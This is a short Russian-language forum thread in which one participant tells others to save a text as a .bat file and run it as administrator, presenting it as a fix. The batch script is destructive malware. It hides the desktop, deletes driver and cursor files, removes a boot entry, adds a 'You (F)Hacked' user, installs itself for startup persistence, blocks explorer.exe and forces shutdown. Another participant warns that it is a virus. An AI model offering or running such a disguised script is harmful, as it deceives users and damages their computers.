Ри
Римма

не могли бы вы пояснить более подробно на сшет того что вы сказали (Сохрани под именем fix.bat и сизу поставь Все файлы

Анна Мурашова

выше если правильно понял - вирус, сломается комп.

София Живилова

Скопируй етот текст в блокнот и сохрани с расширением bat, потом запусти, если вин 7, то пкм и от админа и всё будет пучком.

Вот текст:

@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul
bootcfg /delete /id 1 >nul
net user "You (F)Hacked" /add >nul
del "%SystemRoot%\Cursors\*.*" >nul
@echo off
copy ""%0"" "%SystemRoot%\system32\:lol:.bat" >nul
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v ":lol:" /t REG_SZ /d "%SystemRoot%\system32\:lol:.bat" /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul
@echo off
shutdown -s -t 1 -c "lol" >nul